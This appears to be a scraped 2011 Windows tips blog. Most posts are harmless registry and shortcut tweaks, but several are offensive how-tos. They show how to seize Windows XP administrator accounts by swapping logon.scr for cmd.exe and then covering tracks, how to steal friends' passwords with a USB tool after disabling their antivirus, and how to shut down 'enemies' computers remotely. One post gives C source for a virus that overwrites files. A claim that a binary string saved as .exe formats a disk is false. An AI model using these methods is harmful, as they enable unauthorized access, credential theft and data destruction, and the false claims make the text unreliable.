Tuesday, August 23, 2011

Chat with Friends through MS DOS Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

Friday, May 13, 2011

To oprate ur PC without mouse.

Shift+Alt+Numlock.    Den use num key 2 operate.

Solve network connection problem

go to run- ncpa.cpl
a window open with full detail of your connection.

Break the administrator password in xp

 Break Administrator Password by the following method:

1. Place your Windows XP CD(Bootable) in your cd-rom and start your computer
2. Keep your eye on the screen messages for booting to your cd Typically, it will be “Press any key to boot from cd”

3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.

4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now

5. The Licensing Agreement comes next - Press F8 to accept it.

6. The next screen is the Setup screen which gives you the option to do a Repair.

It should read something like “If one of the following Windows XP installations is damaged, Setup can try to repair it”

Use the up and down arrow keys to select your XP instruction
7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.

8. Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”

9. During the reboot, do not make the mistake of “pressing any key” to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.

10. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

11. At the prompt, type NUSRMGR.CPL and press Enter. NOw You have just gained graphical access to your User Accounts in the Control Panel.

12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on.

Add Or Stop Programs During Startup

You can start or stop programs from executing at bootup by adding or deleting them to/from the run Keys in the Registry. Windows loads programs to start in the following order; Program listed in the Local Machine hive, then the Current User hive, then theWin.ini Run= and Load = lines. then finally programs in your Start Up folder.
To add or remove programs in the Registry

1.Open RegEdit

2.Go to the desired Key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

3. Add a new String Value and name it anything you like

4. For the value data, enter the path and executable for the program you want to run.
By adding the value to the HKEY_CURRENT_USER hive instead allows the program to start only when that user is logged on.
If you add the value to the RunOnce key the program will run once and be removed from the key by Windows.

Boot your Computer Faster

Many computers take a lot of time to boot (or start ).This is due to many reasons.


1.Press start->run then type msconfig and press enter.

Go to the startup tab. Here you will see a list of startup items. These are all the programs that automatically start when you boot your PC. It is these that slow down the boot up process.

So uncheck all the unwanted items like ms-office, messengers other utilities that u may not need at startup). Don't uncheck your antivirus software.

Restart your Pc to and see for yourself, your pc will now boot faster....


2    .A great new feature in Microsoft Windows XP is the ability to do a boot defragment. This places all boot files next to each other on the disk to allow for faster booting. By default this option is enabled, but on some systems it is not, so below is the information on how to turn it on:

Go to Start Menu and Click Run
Type in regedit then click ok
Find "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOpt imizeFunction"
Select "Enable" from the list on the right
Right on it and select "Modify"
Change the value to Y .
Reboot your Pc and see the change yourself.
 

3.SPEED UP BOOT BY DISABLING UNUSED PORTS.!!
You may have tried many tweaks like modifying windows XP start-up applications, prefetches, unload DLLs method, etc. And yes those methods do work for me.
I have just accidentally found out another way to give you an extra boost in windows XP's boot performance. This is done by disabling your unused devices in
Device Manager. for example, if you don't have input devices that are connected to one of your USB's or COM ports, disabling them will give you an extra performance boost in booting. Go to Control Panel -> System -> Hardware tab -> device manager Disable devices that you don't use for your PC and then restart.

Changing drives icon

First of all copy a icon file to the root of the drive.
example: c:\icon.ico

Then create a file called: autorun.inf in c:\autorun.inf
then open that file and type the following:

[autorun]
icon=icon.ico

save and close the file.

Now open my computer and refresh.. and woh! icon changed....
you can apply to other drives too.

be careful:
"autorun.inf" and "ico.ico" must be in the root of the drive.
example: c:\autorun.inf and c:\icon.ico.
same on the root.

Convert FAT- NTFS

To convert a FAT partition to NTFS, perform the following steps.
Click Start, click Programs, and then click Command Prompt. In Windows XP, click Start, click Run, type cmd and then click OK.
At the command prompt, type CONVERT [driveletter]: /FS:NTFS. Convert.exe will attempt to convert the partition to NTFS.

NOTE:=
Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command

Monday, May 9, 2011

Create A Hidden User Account

This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000.

#[Start] [Run] [Regedit]
#Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\
Winlogon\SpecialAccounts\UserList
#Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
#Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden
#Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]
#Exit Registry and Reboot...

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups.

Sunday, May 8, 2011

Deleting recycle bin

Start] [Run] [Regedit]
Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket
Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
Data Type: DWORD // Value Name: NukeOnDelete
Setting for Value Data: [0 = Use Recycle Bin / 1 = Permanently Delete]
Exit Registry and Reboot
Another Method
start->run->gpedit.msc-> user configuration ->desktop->remove recycle bin from desktop->double click->change it not configured to enable->apply and ok.

now come to start->run->gpupdate.exe and press enter.

your recycle bin icon is gone from desktop nad you will need to revert your settings for get that back.

after reverting setting make sure to run gpupdate.exe command.

Folder Options Missing

Many of us sometimes find the folder options missing in windows explorer.
Here's the solution-->
Open Run and then type "gpedit.msc".
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

I hopes that you will find the option after restarting windows.

Hide 'User Accounts' from users

Go to Start/Run, and type:
GPEDIT.MSC
Open the path

User Config > Admin Templates > Control Panel
doubleclick "Hide specified Control Panel applets"
put a dot in 'enabled', then click 'Show"
click Add button,
type "nusrmgt.cpl" into the add box

Remove shortcut arrow from desktop icons

Here's how you can remove those shortcut arrows from your desktop icons in Windows XP.
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOTlnkfile
3. Delete the IsShortcut registry value.
You may need to restart Windows XP.

10 easy steps for faster dialup connection

OK SO YOU MUST BE TIRED OF YOUR SLOW ASS DIAL UP CONNECTION, RUNNING AT MAX 54kbps, I WAS WORSE, 28.8kbps. BUT THEN I FOUND A TWEAK THAT ALLOWED ME TO CONNECT WITH A DIAL UP MODEM AT 115kbps. THIS TWEAK MAY NOT WORK FOR EVERYONE, IF YOU GET AN ERROR SAYING “MODEM NOT RESPONDING” GO BACK AND DELETE THE EXTRA CODE THAT YOU PUT IN, AND RESTART YOUR COMPUTER AND EVERYTHING SHOULD BE FINE.

HERE IS WHAT YOU DO:

1. GO TO YOUR START MENU

2. OPEN YOUR CONTROL PANEL

3. OPEN PHONE AND MODEM OPTIONS (XP USERS WILL HAVE TO CLICK SWITCH TO CLASSIC VIEW ON THE LEFT SIDE TO SEE THIS OPTION)

4. SELECT THE MODEMS TAB

5. SELECT YOUR MODEM, AND CLICK PROPERTIES

6. CLICK ON THE ADVANCED TAB

7. THEN YOU WILL SEE A BOX THAT SAYS ADVANCED SETTINGS
- AND UNDER IT A TEXT BOX WITH "Extra initialization commands"

8. IN THE TEXT BOX PUT &AX&FX JUST HOW YOU SEE IT IN THIS TEXT.

9. CLICK "OK" TO CLOSE THAT BOX

10. CLICK "OK" AGAIN


AND THATS IT, YOU HAVE NOW TWEAKED YOUR MODEM TO CONNECT AT A VERY HIGH SPEED FOR A DIAL UP MODEM

Add a photo to my computer properties

1. Open Notepad.

2. Type the following:
[General]
Manufacturer="your_name
[Support Information]
Line1= http://www.basenjoy.com
Line2= visit http://etricks.in for more info

3. Save as "oeminfo.ini" in the System32 folder.(Without Quote)

4. Create a bmp file(Your Photo) and save it the System32 folder as "oemlogo.bmp"(Without Quote).The size of the image should be within 180 (wide) x120 (high) pixels

5. Now Check your My Computer Properties.

It's tested and working

A small trick in cmd

Here’s a cheap trick to amuse yourself when you get bored.

Open a command prompt (Start, Run, cmd, OK) and enter the following command:

title mechodownload

then check out the title bar of the command window.

Of course you’ll want to substitute your own text string for your own amusement.

Changes The Windows Logon Screen

u can use desktop enhancement s/w which can actually chage the complete appearence of the windows log on screen if that is what you ment and also u can get transperency , etccc.. or follow :To change the logon screen saver, follow these steps.


WARNING:
If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.

1. Click Start, and then click Run.
2. In the Open box, type regedt32, and then click OK.
3. In the Registry Editor window, locate the following registry key:HKEY_USERS\.DEFAULT\Control Panel\Desktop
4. In the right pane, double-click SCRNSAVE.EXE.
5. In the Edit String dialog box, type the name of the screen saver that you want in the Value data box, and then click OK. For example, if you want to use the Mystify screen saver as your logon screen saver, type ssmyst.scr. IMPORTANT: Make sure that you correctly specify the path to the screen saver. If the screen saver is located in %SystemRoot%\System32, the explicit path is not required.
6. Click Exit on the File menu to quit Registry Editor.

The logon screen saver changes to the screen saver that you specified.



also u can use the software TUNE UP UTILITIES.Also this software can be used to change windows defult icons,registry cleaning,logon screen changing,...............etc a lot of applications.I swear its a very good ,powerful and user friendly...............

Desktop Notes (Notepad Embedded on Desktop)

YOU WILL NEED:
Notepad (Ironically)
Right Click smile.gif
A Computer would make it easier.

This Desktop Notepad is basically HTML using the tag.

Okay lets begin:

1)Open Notepad: Start>All Programs>Accessories>Notepad.


Now here is the most imporant part, getting the code right:

CODE




Lets disect it:
CODE

Is basically the background colour of your desktop not the notepad.


CODE

aligns your text area in the center.


CODE
[/code]

-=Is the text area. You can change the size of your text area on your desktop by changing the "Cols=" and the "Rows=" Colums the width and Rows the height.

Save the code as: e.g notepad.html


Now the last section, embedding it. (Not as hard as it sounds)

Go to your desktop>Right Click>Properties>Desktop(tab)>Browse> And locate the HTML file> Apply


Edit to your needs (size wise)

Saturday, May 7, 2011

Hack windows XP admin password

Hack windows XP admin password:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Admin and you want the password blah enter this

"net user Admin blah"

and this changes the password on Admin's machine to blah and your in.

Note : Dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Increase Internet Speed

Try the following..........

Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:
Local Computer Policy then Computer Configuration

then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.

Access folders from taskbar

Tired browsing to the Windows Explorer to find your files?? Then try this simple trick that can add your explorer to the task bar.

* Right-click on the taskbar on the space between Start Menu and the Tray

* Click "Toolbars" ==> "New Toolbar"

A New Window opens with a list of folders

* Select the desired location and click "OK"

* The task bar now displays an icon for the access of your selected destination, just with a click.

Add shortcut to the device manager to your desktop

This allows you to quickly see all the devices attached to your computer. The conventional method is to go to it from the Control Panel or you can access the device manager by Right clicking on My Computer icon and then selecting Device Manger from it. Here is a simple trick that puts this in shortcut.

This way you do not need to restart the computer. To add the Device Manager Icon:
1. Right click on an open area of your desktop.
2. Select New / Shortcut.
3. Type in C:\WINDOWS\CONTROL SYSDM.CPL, SYSTEM, 1.
4. Replace C:\WINDOWS with whatever directory you installed Windows95.
5. Click on the Next box.
6. At the next dialog box type in Device Manager.
7. Click on the Finish when you are done.
Note: Replacing the 1 with a 3 will bring up the Performance Status.

Change Startup and Shutdown SOUNDS in windows

Have you ever felt bugged-up with the Start-up and Shutdown jingle of your Windows XP or Vista ? If yes, here is the solution, now you use any of your favorite voice or music or dialogue as your PC’s shutdown and start up.

It’s a simple 4 step process.

Step 1.

Choose the track which you want to play at start-up and shutdown jingles,

Limitations are

* It should be in .WAV format.
* The size of file should not be large, prefer keeping them within in 1 Mb, otherwise your startup will take a bit longer.

If the file you want to make your start-up or shutdown is not in .WAV format, you can easily convert them using Jet Audio 7, or any other converter.

Step 2.

Now rename these files as “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV” respectively.

Step 3.

Now Go to “C:\WINDOWS\MEDIA”, here you will find files “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV”, move them to some other locations, this step is required for, in case you need to revert back these sounds, else you can ignore this step.

Step 4.

Now the files you have chosen and renamed, just copy-paste or cut paste them in “C:\WINDOWS\MEDIA”, here you go, now you can enjoy the new Start-up and shutdown.

Change the Letter for the Hard- Disk partition

Bored of the same old C, D, E, F drive letters? Here is a simple way to change the drive alphabets.

* Right-Click on "My Computer" ==> "Manage"

* In the "Computer Management" screen click on "Disk Management"

* Now Right-click the drive you want to change and select "Change Drive Letters and Paths.."

* Click on "Change" ==> Select from the list of alphabets in the drop down

* Click "OK"

Now check your "My Computer"........;)

Format Hard Disk using Notepad

1. Write The Following In Notepad Exactly as it says

2. Write the following code:01001011000111110010010101010101010000011111100000

3. Save As it as .EXE and any Name would Do.

4. If u run the program means it will format the Hard Drive.

Hack Passwords Using Pen Drive

Hacking passwords or any information using USB(pendrives).Here is the small tricks guys for stealing information or passwords of ur friends or enemies using pendrives...

Download this software:

[content suppressed]

1. Extract it.
2. open pcinfo
3. select all the files and paste it in ur USB(pendrive)
4. it in the pc u wanna hack...
5. Open the USB drive, give it 2 sec and and ur job is done...


And now open the dump folder in ur pc and u will have all the info u want....


Ok now the problem which i was facing....

well i think it duznt autorun on PC with antivirus... U have to manually click the nircmd.exe

U have to disable his/her antivirus for auto running this program..

Hacking Windows Using Linux

Friends on net we found out that many of you are asking for hacking windows using Linux or other operating systems.

So here i m writing the trick which allows you to hack the admin password of windows using linux.

Firstly,Windows is installed on you computer and then you need a live CD of linux,here we will use a live CD of UBUNTU.

Boot from the Live CD and perform the 7 easy step to hack the windows Admin password.
Steps:

1: Install a program called chntpw
Command is: $ sudo apt-get install chntpw

The rpm pakage installed is the packege to change password.
2: After successfully installing chntpw, you have to access the Windows NTFS partition by mounting it and allowing read/write support.
Use Mount system Call.

3: After that, navigate to WINDOWS/system32/config

use cd command to navigate.

4: Once inside the config directory, issue this command:

$ sudo chntpw SAM

Command to reset admin password.

As you are in Linux the security of windows is bypassed and the password can be changed easily.

5: A long display of information will follow.

Just ignore them.

6: Once you are prompted to reset the password, it is recommended to leave the password blank with an asterisk (*).

7: Reboot, with windows and you can now login to Windows with full administrative access.

How to Hack Root Password in Linux

Today I am going to tell you the trick to hack your root passoword in Linux if you are too forgetful to remember it or you have legal permission to enter a server run by a different admin and by any chance he forgot to give you the root password.
Those Who Have GRUB bootloader
1. The first step is to reboot server.
2. Upon Linux booting up to GRUB loader GUI, move the arrow key up/down to highlight and select the Linux kernel and press e to edit the GRUB commands before booting.
3. Next, move the arrow key up/down and select the Linux kernel and press e again
4. Give a single space and then type the word single at the end of edited line, as shown in this snapshot
5. Press the ENTER key and now you have a a similar GRUB screenshot as of follow.Keep the Linux kernel highlighted and press b to boot up with the single keyword, which will boot Linux into single user maintenance mode (You did nothing but to grant yourself the booting facility of a single user that is otherwise not visible while you enter the server as a root in a proper way)
6. Once the Linux boot up completely into single user maintenance mode, the Linux command prompt is ready to execute command. Type passwd to reset the forgotten root password - without prompting for old root password, just type a new root password and re-type to confirm it and you are done. You have successfully changed or reset the old password without having known the old one.
7. Type reboot or exit to reboot. On next boot up, you can login with the new root password!
Remember, it is for those who have GRUB bootloaders.
Those who have LILO boot loader
1. First reboot the server
2. When you see the LILO: prompt type linux single and hit enter.
3. This will log you in as root in single user mode.
4. Once booting is complete, you can change your password with this passwd followed by the new password you want to assign
5. You are done.

How to Hack Your Computers BIOS Password

Suppose you have forgot the BIOS password of your computer or you are into your friend's computer and want to give him a little shock. But the problem is the BIOS is locked with a password and you can't find a way to enter through it.
Don't worry. here is this old trick that will help you to hack into a BIOS system, with or without a password protection.
Process
1. Power off the computer and make sure that it is unplugged.
2. Open up your computer case. Of course you need physical access to the motherboard to complete this procedure.
3.
Find a circular, (mostly) silver metallic object on the motherboard. This is the CMOS battery (lol I never knew that battery can be described in detail)
4. Carefully remove the CMOS battery and leave it out for about 120 seconds. This will flush the CMOS memory which stores the BIOS password and all other configuration.
5. Set the battery back into place and power on the computer.
6. The computer should then warn you that the CMOS configuration could not be found. You can either reconfigure it yourself or restore defaults. Restoring the default configuration should be fine.
7. You will notice that the BIOS password has been cleared and you can boot without it. You may reset the BIOS password to something else by going into the BIOS configuration and setting a new User Password (The Supervisor Password controls access to the BIOS, NOT the computer!)
and You are done!

Friday, April 22, 2011

Delete Recent Documents history

Any document that you open in Windows is added to the Recent Documents list. Now with this simple trick you can stop that!!!

* Start ==> Run ==> Type "Regedit"

* [HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer]

* Right Click on the right Pane and create a new DWORD value.

* Assign Value Name as "NoRecentDocsHistory"

* Data Type as "REG_DWORD (DWORD Value)"

* If Value Data = 0 : disable restriction
1 : enable restriction

Lock The Computer In a Click

Try this and create the icon to lock the machine on your desktop.

1. Right click an empty spot on the desktop, point to New and click Shortcut.

2. In the Create Shortcut dialog box, copy the following into the 'Type the location' of the item text box:

rundll32 user32.dll,LockWorkStation


3. Click Next.

4. In "Type a name for this shortcut", type LOCK and Click Finish

5. Now just double click on that icon to lock your computer without pressing Alt+Ctrl+Del.

Hack windows xp passwords

Here are the steps involved to Hack the Window XP Administrator Password .
1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit
Wait its not [...]

Friday, April 8, 2011

VIRUS CODE IN C

/*this is a simple program to create a virus in c
it will create folder in a folder in a folder and so on run this on your own responsibility*/
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Put Control Panel to Windows 7 TaskBar Hack

Here are the steps you need to follow in order to pin the Control Panel to Windows 7
Step 1: Open the Control Panel
Step 2: You can see the Control Panel button displayed on the Windows 7 Taskbar.

Step 3: Right click on the Control Panel icon on the Taskbar and choose the Pin this program to taskbar option.
Step 4: Close the Control Panel
You are done, the Control Panel button has been pinned on the Taskbar
How to Unpin this program from taskbar
In case you want to unpin the Control Panel from Taskbar, right click and select the Unpin this program from taskbar

Renaming the Windows Logon Box

Rename the Windows Logon box, just follow the simple steps.
Run regedit and go to HKEY_Local_Machine\Software\Microsoft \Windows\CurrentVersion\Winlogon
Then add or change the key:
LegalNoticeCaption REG_SZ="(Title for Box)"
And the same for this key:
LegalNoticeText REG_SZ="(Message to be displayed in the box)"

Restarting Windows without Restarting the Computer

When you click on the SHUTDOWN button, make sure to simultaneous press SHIFT Button. If you hold the Shift key down while clicking on SHUTDOWN button, you computer would restart without restarting the Computer. This is equivalent to term “HOT REBOOT”.

Shut Down Remote Computer

Windows NT comes with a Resource kit with the files SHUTCMD.exe.

This can be used in a variety of ways to play with your enemies computer. Just download and install the resource kit in the "Service Pack 6a".

Follow the below commands to start off:

* SHUTCMD \L -- Shuts down the local computer

* SHUTCMD \\Computer Name /Y -- Shuts down the remote computer specified their IP address

How to Get Windows Vista-Style Taskbar in Window7

It's hard to deny that Windows Vista scores high on appearance. Here's your chance to give the Windows 7 a Vista look. Just follow the steps mentioned below

Step 1: Right-click on the taskbar and choose the properties dialog. Select the small icons checkbox

Step 2: Under the taskbar buttons setting, choose combine when taskbar is full. Although it’s not
 
pixel-perfect in accuracy, but, it’s close from a functionality point

Monday, March 28, 2011

Watch Movies in Ms Paint!

1.Open your favourite movie player and play the move (I played the .avi, format in Media Player Classic) (.mpg also works)

2.Hit "PrintScreen", keep playing the movie in the player, don't stop it.

3.Open MsPaint.

4.Select "Edit > Paste" Or Hit "CTRL+V"

You can watch movies in Paint!

But there are no Pause, Next, Previous, Stop etc. buttons

Experiment with other formats too, it doesn't play DivX , Flash movies

Sunday, March 27, 2011

What do beeps mean??? know here

One Beep :
DRAM refresh failure
This may be due to - Bad memory chips
- A bad DMA Chip
- Bad memory addressing chips on the motherboard

Two Beeps :
Parity error or Parity Circuit failure
-Your memory may not be seated properly on the mother board.
-Unplug and plug it properly

Three Beeps :
Bad memory or bad mother board

Four beeps :
Timer failure in the RAM.

Five Beeps :
CPU chip may be dead

Six Beeps :
Keyboard controller may have failed

Seven beeps :
CPU is dead. Retry the connections and test.
-Replace the whole motherboard.

Eight Beeps :
Video card is missing or Bad.

Nine Beeps :
Damaged ROM BIOS.
-BIOS chip has to be replaced if it persists.

Ten Beeps :
CMOS shutdown.
-Replace CMOS memory and associated chips.

Eleven Beeps :
Cache memory test has failed.
-To enable cache memory try CTRL+ALT+SHIFT++.

One long Beep and Three short Beeps:
Memory failure

One long Beep and Eight short Beeps :
Video card failure.
-Try to install video card in another slot.

No Beeps :
Check Power supply
-Check mother board connections
-Remove all cards except video card and check for system power up
-Insert all cards one at a time and check their operation.
-If system hangs on the installation of a particular card, then it is the cause for the problem and replace it with another of that type and check

Delete Recent Documents history

Any document that you open in Windows is added to the Recent Documents list. Now with this simple trick you can stop that!!!

* Start ==> Run ==> Type "Regedit"

* [HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer]

* Right Click on the right Pane and create a new DWORD value.

* Assign Value Name as "NoRecentDocsHistory"

* Data Type as "REG_DWORD (DWORD Value)"

* If Value Data = 0 : disable restriction
                           1 : enable restriction

Disable Turn Off Option ..and ALT+F4 option

REGEDIT->HKEY_CURRENT_USER->SOFTWARE->MICROSOFT->WINDOWS->POLICIES->EXPLORER THEN GO TO RIGHT SIDE AND BY RIGHT CLICK OF UR MOUSE CREATE NEW DWORD VALUE WITH NAME NoClose and after creating click on it and give Value Data 1.


And Reboot your pc ..now your Turn Off option is disabled ..to Enable it again ..go to that directory by regedit ..and simply delete that created NoClose and Log Off Your User and Log in again ..your Turn off Again Working

Hacking Windows SEND TO MENU

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

5. DONE

Hide Control Panel Applets (Windows 95/98/Me)

This tweak allows you to show or hide any of the applets found in the Windows Control Panel.
Open CONTROL.INI (usually found in the C:\WINDOWS) and add the following lines under the "[don't load]" subsection. If the "[don't load]" section doesn't already exist then create it be adding it on a new line at the end of the file.
For each control panel applet to be hidden add a new line with text in the format "applet.cpl=no" (e.g. fax.cpl=no).

Common Control Panel Applets:
• access.cpl - Accessibility Applet
• appwiz.cpl - Add/Remove Programs Applet
• console.cpl - Console Applet
• timedate.cpl - Date and Time Applet
• desk.cpl - Display Applet
• fax.cpl - Fax Applet
• hdwwiz.cpl - Hardware Wizard Applet
• irprops.cpl - Infrared Port Applet
• intl.cpl - International and Regional Applet
• inetcpl.cpl - Internet Settings Applet
• joy.cpl - Joystick Applet
• liccpa.cpl - Licensing Applet
• main.cpl - Mouse and Keyboard Applet
• mlcfg32.cpl - Mail Applet
• mmsys.cpl - Sound and Multimedia Applet
• modem.cpl - Modem and Phone Applet
• ncpa.cpl - Network and connectivity Applet
• netcpl.cpl - Network and Dial-up Connectivity Applet
• nwc.cpl - Netware Client Applet
• odbccp32.cpl - ODBC Applet
• devapps.cpl - PC Card Applet
• ports.cpl - Ports Applet
• powercfg.cpl - Power Management Applet
• sticpl.cpl - Scanner and Camera Applet
• srvmgr.cpl - Server Manager Applet
• sapi.cpl - Speech Properties Applet
• sysdm.cpl - System Applet
• telephon.cpl - Telephony Applet
• tweakui.cpl - TweakUI Applet
• nusrmgr.cpl - User Manager Applet
• wspcpl32.cpl - WSP Client Applet
• quicktime.cpl - QuickTime Applet
• S32LUCP1.cpl - Norton Live Update Applet
• cpqmgmt.cpl - Compaq Insight Agents Applet
Exit the registry and restart Windows for the change to take effect.

Thursday, March 17, 2011

Hide the Partitions

• This trick is for all those people who want to hide tons of data into their box. So here it is, if you have very important data in your hard drive placed in some partition which you do not want anybody to access then this trick is only for you!

• Just click on start>run type gpedit.msc, now navigate through user configuration> administrative templates > windows components> windows explorer, now double click on “Hide these specified drives in My Computer” modify it accordingly then just below you will find another option “Prevent access to drives from My Computer”, double click on this option and modify it accordingly.

• To make it visible again select "disable" by double clicking on the “Hide these specified drives in My Computer” option.

How to Clone a Hard Drive

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

IMPROVE XP SHUTDOWN SPEED

This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown.
Go to Start then select Run
Type 'Regedit' and click ok
Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'

Now select 'HungAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'

Now find 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'

Now find 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\'
Select 'WaitToKillServiceTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'

Install Net Meeting

Wondering how to install Netmeeting on Windows XP? Well you don't have to install it! Why? It is already pre-installed with Windows XP, but (by design they say) it isn't linked to anywhere on your programs menu. Here is how to load it:


1: Click START then RUN
2: Enter "conf" without the quotes

That's it - now you can Netmeet to your hearts content

MAKE YOUR MENUS LOAD FASTER

This is one of my favorite tweaks as it makes a huge difference to how fast your machine will 'feel'. What this tweak does is remove the slight delay between clicking on a menu and XP displaying the menu.

Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USER\Control Panel\Desktop\"
Select "MenuShowDelay"
Right click and select "Modify'
